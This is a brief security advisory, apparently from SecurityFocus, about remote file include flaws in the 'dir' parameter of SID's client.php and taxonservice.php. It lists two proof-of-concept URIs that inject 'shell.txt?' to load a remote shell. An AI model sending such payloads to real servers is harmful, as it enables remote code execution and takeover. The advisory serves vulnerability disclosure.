SID 'dir' Parameter Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/SID_box_notns_path/client.php?dir=shell.txt?
http://www.example.com/SID_box_notns_path/taxonservice.php?dir=shell.txt?


 

Privacy Statement
Copyright 2010, SecurityFocus